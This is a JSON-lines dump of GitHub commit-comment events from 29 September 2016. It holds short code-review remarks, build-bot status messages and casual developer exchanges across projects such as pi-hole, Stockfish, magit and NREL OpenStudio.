{"id":"4638875187","type":"CommitCommentEvent","actor":{"login":"PromoFaux"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":19228233,"position":null,"line":null,"path":null,"commit_id":"cd30a7533efb01f180ae96e3b3833c04ac94b852","created_at":"2016-09-29T17:54:15Z","updated_at":"2016-09-29T17:54:15Z","body":"Cheers man! I wonder why it's not called php-sqlite...."}},"created_at":"2016-09-29T17:54:15Z"}
{"id":"4638878208","type":"CommitCommentEvent","actor":{"login":"senica"},"repo":{"name":"senica/riot"},"payload":{"comment":{"id":19228241,"position":13,"line":316,"path":"lib/browser/tag/tag.js","commit_id":"edaf92b768bdf13fca49af86ce11971b72fc26f9","created_at":"2016-09-29T17:54:47Z","updated_at":"2016-09-29T17:54:47Z","body":"By the time we get here, the data has already changed and the dom has already re-ordered."}},"created_at":"2016-09-29T17:54:47Z"}
{"id":"4638878536","type":"CommitCommentEvent","actor":{"login":"stockfishdeveloper"},"repo":{"name":"lucasart/Demolito"},"payload":{"comment":{"id":19228243,"position":null,"line":null,"path":null,"commit_id":"fcad29200a5e061f6037c770be2b610db047698c","created_at":"2016-09-29T17:54:51Z","updated_at":"2016-09-29T17:54:51Z","body":"Right. I wanted to know the **actual** ELO rating of Sungorus to determine the actual rating of Demolito."}},"created_at":"2016-09-29T17:54:51Z"}
{"id":"4638880139","type":"CommitCommentEvent","actor":{"login":"klickverbot"},"repo":{"name":"weka-io/ldc"},"payload":{"comment":{"id":19228246,"position":24,"line":111,"path":"driver/linker.cpp","commit_id":"c1fadc936a12ce544064f94912daeee4c36079b7","created_at":"2016-09-29T17:55:09Z","updated_at":"2016-09-29T17:55:09Z","body":"> you don't need to explain what LTO does, thank you.\r\n\r\nWell, quite apparently you aren't as aware of the details of the LLVM optimisation pipeline as you thought you were, otherwise you wouldn't have thought it would make sense to map CodeGenOptLevel to -O<n> in the first place."}},"created_at":"2016-09-29T17:55:09Z"}
{"id":"4638881940","type":"CommitCommentEvent","actor":{"login":"feross"},"repo":{"name":"feross/standard"},"payload":{"comment":{"id":19228251,"position":null,"line":null,"path":null,"commit_id":"85e19d6de535d863613d67ad0f6d3bb6eae9bab3","created_at":"2016-09-29T17:55:28Z","updated_at":"2016-09-29T17:55:28Z","body":"Yeah, I'm not a fan of folks aggressively dropping Node 0.10 and 0.12 support either, but this came from ESLint. We enabled a bunch of bug-catching new rules in `standard` v8, so I think it's a net win.\r\n\r\nAlso, you can keep 0.10 and 0.12 in your Travis tests, because `standard` will pass on those versions, without running. 👍 "}},"created_at":"2016-09-29T17:55:28Z"}
{"id":"4638886764","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19228261,"position":null,"line":null,"path":null,"commit_id":"8c1546831629da0444b02257190e6921e78cefac","created_at":"2016-09-29T17:56:17Z","updated_at":"2016-09-29T17:56:17Z","body":"Wow! I didnt know it! That's perfect\r\n\r\nI alteady merged your fork into mine and fixed a couple of things ;) the project starts working pretty well now!"}},"created_at":"2016-09-29T17:56:17Z"}
{"id":"4638889501","type":"CommitCommentEvent","actor":{"login":"charlesfrantz"},"repo":{"name":"gus/gocql"},"payload":{"comment":{"id":19228271,"position":null,"line":null,"path":null,"commit_id":"8b4a22a50a6a5e04240a23048bf34cf9fe08cba9","created_at":"2016-09-29T17:56:45Z","updated_at":"2016-09-29T17:56:45Z","body":"LGTM"}},"created_at":"2016-09-29T17:56:45Z"}
{"id":"4638902072","type":"CommitCommentEvent","actor":{"login":"kylefleming"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19228304,"position":null,"line":null,"path":null,"commit_id":"0a2b9c237d803394f5f9202e679b4a9a53f1f099","created_at":"2016-09-29T17:58:59Z","updated_at":"2016-09-29T17:58:59Z","body":"canStartMoving allows you to prevent the user from starting to drag the event, instead of allowing them to drag but only blocking the move once they drop it. For our app, we wanted to have gray event areas that signified the user is busy during that time, so we wanted to prevent the user from dragging it at all."}},"created_at":"2016-09-29T17:58:59Z"}
{"id":"4638902307","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19228307,"position":null,"line":null,"path":null,"commit_id":"1a9714483ac527ec3f65b9c135bae8717851e403","created_at":"2016-09-29T17:59:02Z","updated_at":"2016-09-29T17:59:02Z","body":"input_processor_refactor (mbadams5) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.53%25-red.svg)</a> \n"}},"created_at":"2016-09-29T17:59:02Z"}
{"id":"4638903360","type":"CommitCommentEvent","actor":{"login":"amitjoy"},"repo":{"name":"eclipse/kura"},"payload":{"comment":{"id":19228311,"position":28,"line":15,"path":"kura/org.eclipse.kura.camel/src/main/java/org/eclipse/kura/camel/component/package-info.java","commit_id":"360bc5d517986bdf8402be698324265644244327","created_at":"2016-09-29T17:59:13Z","updated_at":"2016-09-29T17:59:13Z","body":"Typo"}},"created_at":"2016-09-29T17:59:13Z"}
{"id":"4638903539","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19228312,"position":40,"line":39,"path":"libselinux/utils/Makefile","commit_id":"9a30d1e6b7ca9836ab0c675cb650bcdfd210317f","created_at":"2016-09-29T17:59:15Z","updated_at":"2016-09-29T17:59:15Z","body":"That was to ensure that it still compiled if you ran make directly in the src subdirectory.  The warning flags seem different.  OTOH, I suppose which warning flags you can enable might differ per-subdirectory in theory.  I don't know. I guess you can leave it for now."}},"created_at":"2016-09-29T17:59:15Z"}
{"id":"4638905347","type":"CommitCommentEvent","actor":{"login":"ZinChen"},"repo":{"name":"ZinChen/durak-card-game"},"payload":{"comment":{"id":19228318,"position":null,"line":null,"path":null,"commit_id":"99c586e451cb937d90db05f3265a9cbe996d58a9","created_at":"2016-09-29T17:59:34Z","updated_at":"2016-09-29T17:59:34Z","body":"А ещё можно вставлять кучу иконок, даже в названия коммитов :floppy_disk: :)"}},"created_at":"2016-09-29T17:59:34Z"}
{"id":"4638906791","type":"CommitCommentEvent","actor":{"login":"ZinChen"},"repo":{"name":"ZinChen/durak-card-game"},"payload":{"comment":{"id":19228319,"position":null,"line":null,"path":null,"commit_id":"99c586e451cb937d90db05f3265a9cbe996d58a9","created_at":"2016-09-29T17:59:50Z","updated_at":"2016-09-29T17:59:50Z","body":"Вот весь список https://gist.github.com/AliMD/3344523\r\n"}},"created_at":"2016-09-29T17:59:50Z"}
{"id":"4638907446","type":"CommitCommentEvent","actor":{"login":"luc-steffens-2014"},"repo":{"name":"xefke/ex2-bruylants-kristof"},"payload":{"comment":{"id":19228323,"position":null,"line":null,"path":null,"commit_id":"1af7d82f652e21bd245a84dc80797630ff3d47e5","created_at":"2016-09-29T17:59:57Z","updated_at":"2016-09-29T17:59:57Z","body":"Bert Nice :-)"}},"created_at":"2016-09-29T17:59:57Z"}
{"id":"4638907537","type":"CommitCommentEvent","actor":{"login":"fffonion"},"repo":{"name":"joylio/joyncong"},"payload":{"comment":{"id":19228324,"position":9,"line":9,"path":"Our Shared Goals/Website.md","commit_id":"9daeb8e692994886b6ca5675efe9a36458e7e133","created_at":"2016-09-29T17:59:58Z","updated_at":"2016-09-29T17:59:58Z","body":"👍 gud"}},"created_at":"2016-09-29T17:59:58Z"}
{"id":"4638909566","type":"CommitCommentEvent","actor":{"login":"luc-steffens-2014"},"repo":{"name":"xefke/ex2-bruylants-kristof"},"payload":{"comment":{"id":19228330,"position":null,"line":null,"path":null,"commit_id":"1af7d82f652e21bd245a84dc80797630ff3d47e5","created_at":"2016-09-29T18:00:18Z","updated_at":"2016-09-29T18:00:18Z","body":"Very Nice :-)"}},"created_at":"2016-09-29T18:00:18Z"}
{"id":"4638911879","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19228337,"position":null,"line":null,"path":null,"commit_id":"9a57601f527c81efa00d1bc6a82dd3d7dccb9e7c","created_at":"2016-09-29T18:00:41Z","updated_at":"2016-09-29T18:00:41Z","body":"a) you changed the Centerbing for file E and F instead of D and E. Why ?\r\nb) In your previous version, there was a  `& shift<Up>(ourPawns)` at line 189."}},"created_at":"2016-09-29T18:00:41Z"}
{"id":"4638915616","type":"CommitCommentEvent","actor":{"login":"dgadelha"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19228352,"position":null,"line":null,"path":null,"commit_id":"7a3c50f66d386009671c36fde20e57a951ea30d4","created_at":"2016-09-29T18:01:18Z","updated_at":"2016-09-29T18:01:18Z","body":"It's rebooting to recovery because the system server fails to start.\r\nInstead of cleaning the device tree to hold the issues, you are bloating it more, increasing the issues list.\r\nHave you tried to do what I told you? Remove the libcamera*.so for vendor/asus/ctp-common/proprietary/lib/\r\nAbout the ramdisk, well, that's where I failed. Looks like we need to support the original /init file, and we don't.\r\nA little help from @artefvck would be nice here. I tried his kernel, yet, failed. No support for original /init file, only for prebuilt."}},"created_at":"2016-09-29T18:01:18Z"}
{"id":"4638916447","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19228356,"position":null,"line":null,"path":null,"commit_id":"fdf1fc1e6bc345b276d02b594f7a4bd3655daa80","created_at":"2016-09-29T18:01:26Z","updated_at":"2016-09-29T18:01:26Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fdf1fc1e6bc345b276d02b594f7a4bd3655daa80-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fdf1fc1e6bc345b276d02b594f7a4bd3655daa80-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T18:01:26Z"}
{"id":"4638917776","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19228360,"position":null,"line":null,"path":null,"commit_id":"0a2b9c237d803394f5f9202e679b4a9a53f1f099","created_at":"2016-09-29T18:01:40Z","updated_at":"2016-09-29T18:01:40Z","body":"Yeah, makes sense ;)"}},"created_at":"2016-09-29T18:01:40Z"}
{"id":"4638924785","type":"CommitCommentEvent","actor":{"login":"aminmeyghani"},"repo":{"name":"aminmeyghani/ng-webpack-autoload"},"payload":{"comment":{"id":19228373,"position":null,"line":null,"path":null,"commit_id":"b0e622cf4da976179c599faec5aa122fd7b98fb1","created_at":"2016-09-29T18:02:55Z","updated_at":"2016-09-29T18:02:55Z","body":"what happens here is that because the context is app/src, webpack will anything that exports a function. Since our directive file is exporting the function, it gets automatically added to the boot module."}},"created_at":"2016-09-29T18:02:55Z"}
{"id":"4638933196","type":"CommitCommentEvent","actor":{"login":"kylefleming"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19228394,"position":null,"line":null,"path":null,"commit_id":"cab4398aa74fae182ae83fd1dd0d90d327bba561","created_at":"2016-09-29T18:04:24Z","updated_at":"2016-09-29T18:04:24Z","body":"I was noticing that sometimes the timer got fired on slightly before the minute, by something like 3 milliseconds sometimes. The time would look like 6:04:59.997 and would show it as 6:04 instead of 6:05. I was noticing that each time the timer fired, it would display the time 1 minute behind the real time.\r\n\r\nAfter thinking about it for a bit though, I think a better approach would be to just check if it's super close and round up instead of changing when the timer fires."}},"created_at":"2016-09-29T18:04:24Z"}
{"id":"4638934769","type":"CommitCommentEvent","actor":{"login":"welding3000"},"repo":{"name":"welding3000/ForEach1"},"payload":{"comment":{"id":19228402,"position":null,"line":null,"path":null,"commit_id":"721a59b833dd5a649b01f29c31ea952f69eb3951","created_at":"2016-09-29T18:04:41Z","updated_at":"2016-09-29T18:04:41Z","body":"este es un contenido de php "}},"created_at":"2016-09-29T18:04:41Z"}
{"id":"4638936213","type":"CommitCommentEvent","actor":{"login":"tank0412"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19228412,"position":null,"line":null,"path":null,"commit_id":"7a3c50f66d386009671c36fde20e57a951ea30d4","created_at":"2016-09-29T18:04:58Z","updated_at":"2016-09-29T18:04:58Z","body":"`Have you tried to do what I told you? Remove the libcamera*.so for vendor/asus/ctp-common/proprietary/lib/`\r\nWhat? Of couse i did it.\r\nAlso i bring up init.rc of N to out device.\r\n`Instead of cleaning the device tree to hold the issues, you are bloating it more, increasing the issues list.`\r\nMy latest commits broke nothing.(verified)\r\nI do all what i want. And it is not your business what i am doing.\r\nThanks.\r\n"}},"created_at":"2016-09-29T18:04:58Z"}
{"id":"4638937981","type":"CommitCommentEvent","actor":{"login":"danlamanna"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19228423,"position":18,"line":30,"path":"tests/cases/custom_root_test.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T18:05:18Z","updated_at":"2016-09-29T18:05:18Z","body":"I'm going to have to check this code out and run it because I thought it actually needed to load plugins from both directories (meaning mocking a single plugin dir wouldn't work).\r\n\r\nRegardless, I ended up doing something similar here: https://github.com/girder/girder/pull/1484/files#diff-eac0e19d23de1db786e659dde73b22a1R29 (though I have to call it twice?)."}},"created_at":"2016-09-29T18:05:18Z"}
{"id":"4638942790","type":"CommitCommentEvent","actor":{"login":"kylefleming"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19228434,"position":null,"line":null,"path":null,"commit_id":"8887b4c5516533c452361b784ba755664cd84815","created_at":"2016-09-29T18:06:11Z","updated_at":"2016-09-29T18:06:11Z","body":"Ok great, yea I was having an issue where the self.shortPress wasn't set when setup got called, so this was definitely a short-term hack."}},"created_at":"2016-09-29T18:06:11Z"}
{"id":"4638943111","type":"CommitCommentEvent","actor":{"login":"gabrielhenz"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19228435,"position":25,"line":41,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"aef19ee1fa19018aedf342a563c872a1e6fcc2a6","created_at":"2016-09-29T18:06:15Z","updated_at":"2016-09-29T18:06:15Z","body":"Commit para refatoração feito, obrigado pela orientação. O commit foi feito como 'fix', me confundi na hora. Seria melhor eu desfazer e commitar novamente?"}},"created_at":"2016-09-29T18:06:15Z"}
{"id":"4638944402","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19228440,"position":null,"line":null,"path":null,"commit_id":"9a57601f527c81efa00d1bc6a82dd3d7dccb9e7c","created_at":"2016-09-29T18:06:30Z","updated_at":"2016-09-29T18:06:30Z","body":"Because I submitted the wrong version! I stop and resubmit, this is getting ridiculous."}},"created_at":"2016-09-29T18:06:30Z"}
{"id":"4638945215","type":"CommitCommentEvent","actor":{"login":"jrmartin"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19228442,"position":7,"line":217,"path":"src/main/webapp/js/tests/casperjs/geppetto-tests.js","commit_id":"a8bae8571e3d5351dd9801b75c43d503c32c94b0","created_at":"2016-09-29T18:06:39Z","updated_at":"2016-09-29T18:06:39Z","body":"Ended up getting rid of the inject call and still works. Not sure why it didn't couple weeks ago without it, probably I had more than one bug going o, and one got masked as a jquery issue when it was something else. "}},"created_at":"2016-09-29T18:06:39Z"}
{"id":"4638949957","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19228451,"position":null,"line":null,"path":null,"commit_id":"f787c480fd229c6dd7ecb87618d6235499c85dcc","created_at":"2016-09-29T18:07:30Z","updated_at":"2016-09-29T18:07:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Rx5oQm8MRn6y_KXeJUs6BQ"}},"created_at":"2016-09-29T18:07:30Z"}
{"id":"4638953129","type":"CommitCommentEvent","actor":{"login":"danlamanna"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19228462,"position":273,"line":293,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T18:08:06Z","updated_at":"2016-09-29T18:08:06Z","body":"This is unrelated to this PR - but should we throw an error if there is no `plugin.{json,yml}` presen"}},"created_at":"2016-09-29T18:08:06Z"}
{"id":"4638953568","type":"CommitCommentEvent","actor":{"login":"winword9"},"repo":{"name":"winword9/myworld"},"payload":{"comment":{"id":19228467,"position":null,"line":null,"path":null,"commit_id":"107678e6c663006c775ff651c8beffdbd5c1507e","created_at":"2016-09-29T18:08:11Z","updated_at":"2016-09-29T18:08:11Z","body":"This is my first commit!"}},"created_at":"2016-09-29T18:08:11Z"}
{"id":"4638954044","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19228470,"position":null,"line":null,"path":null,"commit_id":"7860a2339de71d803a4a17dd86f095dd2723b92d","created_at":"2016-09-29T18:08:16Z","updated_at":"2016-09-29T18:08:16Z","body":"<img width=\"838\" alt=\"bildschirmfoto 2016-09-29 um 20 07 36\" src=\"https://cloud.githubusercontent.com/assets/6609040/18966160/73c76aca-8680-11e6-8da3-82a390028719.png\">\r\n"}},"created_at":"2016-09-29T18:08:16Z"}
{"id":"4638956018","type":"CommitCommentEvent","actor":{"login":"f3rnando"},"repo":{"name":"steemit-intl/steemit.com"},"payload":{"comment":{"id":19228477,"position":null,"line":null,"path":null,"commit_id":"6c85a80357a23a71b4177bc0afe027ef0b74f15d","created_at":"2016-09-29T18:08:36Z","updated_at":"2016-09-29T18:08:36Z","body":":+1: "}},"created_at":"2016-09-29T18:08:36Z"}
{"id":"4638961584","type":"CommitCommentEvent","actor":{"login":"iqbal-lab"},"repo":{"name":"rmnorris/pandora"},"payload":{"comment":{"id":19228491,"position":null,"line":null,"path":null,"commit_id":"93f0737e82b8b6f1df13eb8d30f123ad0eeb10a3","created_at":"2016-09-29T18:09:38Z","updated_at":"2016-09-29T18:09:38Z","body":"Hurrah ! @rmnorris "}},"created_at":"2016-09-29T18:09:38Z"}
{"id":"4638961920","type":"CommitCommentEvent","actor":{"login":"quantonganh"},"repo":{"name":"bogdal/sentry-youtrack"},"payload":{"comment":{"id":19228492,"position":4,"line":52,"path":"sentry_youtrack/youtrack.py","commit_id":"651ebfe8fd48e0fb3c16caab0e5643a0ce189ff7","created_at":"2016-09-29T18:09:42Z","updated_at":"2016-09-29T18:09:42Z","body":"This works but we still get the message [\"Unable to connect to YouTrack\"](https://github.com/bogdal/sentry-youtrack/blob/master/sentry_youtrack/forms.py#L247) that can make the user confused."}},"created_at":"2016-09-29T18:09:42Z"}
{"id":"4638966425","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19228506,"position":null,"line":null,"path":null,"commit_id":"5464e251954c8a2578cdc2c0b9c170e7e2ee684e","created_at":"2016-09-29T18:10:31Z","updated_at":"2016-09-29T18:10:31Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#fur4_5MZSsiEQI8tAyQzAw"}},"created_at":"2016-09-29T18:10:31Z"}
{"id":"4638967121","type":"CommitCommentEvent","actor":{"login":"kumanan12"},"repo":{"name":"kumanan12/html5labs"},"payload":{"comment":{"id":19228509,"position":null,"line":null,"path":null,"commit_id":"6211df53a686653bcd9c670586726e98b054b2a6","created_at":"2016-09-29T18:10:38Z","updated_at":"2016-09-29T18:10:38Z","body":"This is a special file and should not be treated as a regular html file. It is called html fragments."}},"created_at":"2016-09-29T18:10:38Z"}
{"id":"4638973719","type":"CommitCommentEvent","actor":{"login":"bholmes"},"repo":{"name":"xamarin/GoogleApisForiOSComponents"},"payload":{"comment":{"id":19228522,"position":null,"line":null,"path":null,"commit_id":"4110d5570c36b1637ff2b0aba1653175ae828d8d","created_at":"2016-09-29T18:11:49Z","updated_at":"2016-09-29T18:11:49Z","body":"@dhaligas https://www.nuget.org/packages/Xamarin.Google.iOS.Maps/2.1.0\r\n\r\nI just did it"}},"created_at":"2016-09-29T18:11:49Z"}
{"id":"4638974745","type":"CommitCommentEvent","actor":{"login":"KallynGowdy"},"repo":{"name":"Ferris-DMSE/Anything"},"payload":{"comment":{"id":19228524,"position":15,"line":10,"path":"src/StudentDataViewer/Models/Course.cs","commit_id":"7471b93365b1d43f7f341b3491016088b2dd2ea2","created_at":"2016-09-29T18:12:00Z","updated_at":"2016-09-29T18:12:00Z","body":"@EAslakson Can you add the CourseID property?"}},"created_at":"2016-09-29T18:12:00Z"}
{"id":"4638976771","type":"CommitCommentEvent","actor":{"login":"obenland"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19228526,"position":26,"line":26,"path":"client/state/states-list/actions.js","commit_id":"2cedce86d1250a54fe011f1438415265b5147655","created_at":"2016-09-29T18:12:22Z","updated_at":"2016-09-29T18:12:22Z","body":"The API tests use uppercase in the response but lowercase in the request URL. @gwwar has it as uppercase in her schema suggestion.\r\nI don't feel too strongly about either but using lowercase in URLs and for object properties that are not constants (`state.us`) would tip the scale that way for me. Any thoughts?"}},"created_at":"2016-09-29T18:12:22Z"}
{"id":"4638977656","type":"CommitCommentEvent","actor":{"login":"elsupergomez"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19228532,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-29T18:12:31Z","updated_at":"2016-09-29T18:12:31Z","body":"@sevoku Thanks, I tested in Fedora 24 with the official packages and work fine now both, Gtk and Gtk3."}},"created_at":"2016-09-29T18:12:31Z"}
{"id":"4638977785","type":"CommitCommentEvent","actor":{"login":"KallynGowdy"},"repo":{"name":"Ferris-DMSE/Anything"},"payload":{"comment":{"id":19228533,"position":20,"line":36,"path":"src/StudentDataViewer/Services/DataStore.cs","commit_id":"7471b93365b1d43f7f341b3491016088b2dd2ea2","created_at":"2016-09-29T18:12:32Z","updated_at":"2016-09-29T18:12:32Z","body":"Just uncomment this stuff so that it returns the data"}},"created_at":"2016-09-29T18:12:32Z"}
{"id":"4638978688","type":"CommitCommentEvent","actor":{"login":"KallynGowdy"},"repo":{"name":"Ferris-DMSE/Anything"},"payload":{"comment":{"id":19228535,"position":20,"line":36,"path":"src/StudentDataViewer/Services/DataStore.cs","commit_id":"7471b93365b1d43f7f341b3491016088b2dd2ea2","created_at":"2016-09-29T18:12:43Z","updated_at":"2016-09-29T18:12:43Z","body":"Nevermind, we don't need this"}},"created_at":"2016-09-29T18:12:43Z"}
{"id":"4638982064","type":"CommitCommentEvent","actor":{"login":"kylefleming"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19228542,"position":null,"line":null,"path":null,"commit_id":"8c1546831629da0444b02257190e6921e78cefac","created_at":"2016-09-29T18:13:18Z","updated_at":"2016-09-29T18:13:18Z","body":"Ok awesome. Any questions/comments?"}},"created_at":"2016-09-29T18:13:18Z"}
{"id":"4638982481","type":"CommitCommentEvent","actor":{"login":"KallynGowdy"},"repo":{"name":"Ferris-DMSE/Anything"},"payload":{"comment":{"id":19228543,"position":15,"line":31,"path":"src/StudentDataViewer/Services/DataStore.cs","commit_id":"7471b93365b1d43f7f341b3491016088b2dd2ea2","created_at":"2016-09-29T18:13:22Z","updated_at":"2016-09-29T18:13:22Z","body":"If you could remove this exception, I think we don't need it"}},"created_at":"2016-09-29T18:13:22Z"}
{"id":"4638983087","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19228544,"position":null,"line":null,"path":null,"commit_id":"3ffd6468201873b5ad669f2e89413f7f6086515c","created_at":"2016-09-29T18:13:29Z","updated_at":"2016-09-29T18:13:29Z","body":"\"Doomageddon\" sounds cool too (for a pirate name) :3"}},"created_at":"2016-09-29T18:13:29Z"}
{"id":"4638983799","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"rust-lang/blog.rust-lang.org"},"payload":{"comment":{"id":19228548,"position":null,"line":null,"path":null,"commit_id":"d954f5fa36531a44d2b204da046b186ee62b66b4","created_at":"2016-09-29T18:13:36Z","updated_at":"2016-09-29T18:13:36Z","body":"You were faster than me by 3 minutes :P"}},"created_at":"2016-09-29T18:13:36Z"}
{"id":"4638985448","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":19228551,"position":null,"line":null,"path":null,"commit_id":"4273e837bdc60d831012838d398f95c28d6ef311","created_at":"2016-09-29T18:13:52Z","updated_at":"2016-09-29T18:13:52Z","body":"That's due to how Melpa builds packages. I was actually aware that I this could happen, and that I would have to wait a few hours until I could push `magit` after pushing `with-editor`. But I implemented some other cool stuff and then pushed everything, forgetting completely about this.\r\n\r\nUpdate `with-editor` and everything should work again."}},"created_at":"2016-09-29T18:13:52Z"}
{"id":"4638987980","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19228562,"position":null,"line":null,"path":null,"commit_id":"efce78bc946ce268ca9ef75a12d4f022cd1c7d4c","created_at":"2016-09-29T18:14:18Z","updated_at":"2016-09-29T18:14:18Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2284 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-efce78bc946ce268ca9ef75a12d4f022cd1c7d4c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-efce78bc946ce268ca9ef75a12d4f022cd1c7d4c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.47%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T18:14:18Z"}
{"id":"4638991750","type":"CommitCommentEvent","actor":{"login":"KallynGowdy"},"repo":{"name":"Ferris-DMSE/Anything"},"payload":{"comment":{"id":19228570,"position":15,"line":10,"path":"src/StudentDataViewer/Models/Course.cs","commit_id":"7471b93365b1d43f7f341b3491016088b2dd2ea2","created_at":"2016-09-29T18:14:59Z","updated_at":"2016-09-29T18:14:59Z","body":"Can you also add these properties:\r\nCourseNumber String (9)\r\nCredit # (Double/Decimal)\r\nSemester: (One of Spring, Summer, Fall, Winter) - Enum\r\nYear: #\r\nCourseType: (One of Core, GeneralEducation, Elective) - Enum"}},"created_at":"2016-09-29T18:14:59Z"}
{"id":"4638992241","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19228571,"position":null,"line":null,"path":null,"commit_id":"7860a2339de71d803a4a17dd86f095dd2723b92d","created_at":"2016-09-29T18:15:03Z","updated_at":"2016-09-29T18:15:03Z","body":"Nun aber: https://github.com/MarkusHiller/OpenSoccer/commit/22764af7a31192d928db6539396999f46958ac81"}},"created_at":"2016-09-29T18:15:03Z"}
{"id":"4638992346","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19228573,"position":null,"line":null,"path":null,"commit_id":"7e9da4468c2d74debaddcb21269b44442e3e2f2f","created_at":"2016-09-29T18:15:04Z","updated_at":"2016-09-29T18:15:04Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ctiX-noYQVuyRu3VCI5Kcw"}},"created_at":"2016-09-29T18:15:04Z"}
{"id":"4638994006","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19228577,"position":null,"line":null,"path":null,"commit_id":"24455d236c6c1724cdc29b6c9add2983770513db","created_at":"2016-09-29T18:15:20Z","updated_at":"2016-09-29T18:15:20Z","body":"MakeWebKitWork (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24455d236c6c1724cdc29b6c9add2983770513db-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24455d236c6c1724cdc29b6c9add2983770513db-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T18:15:20Z"}
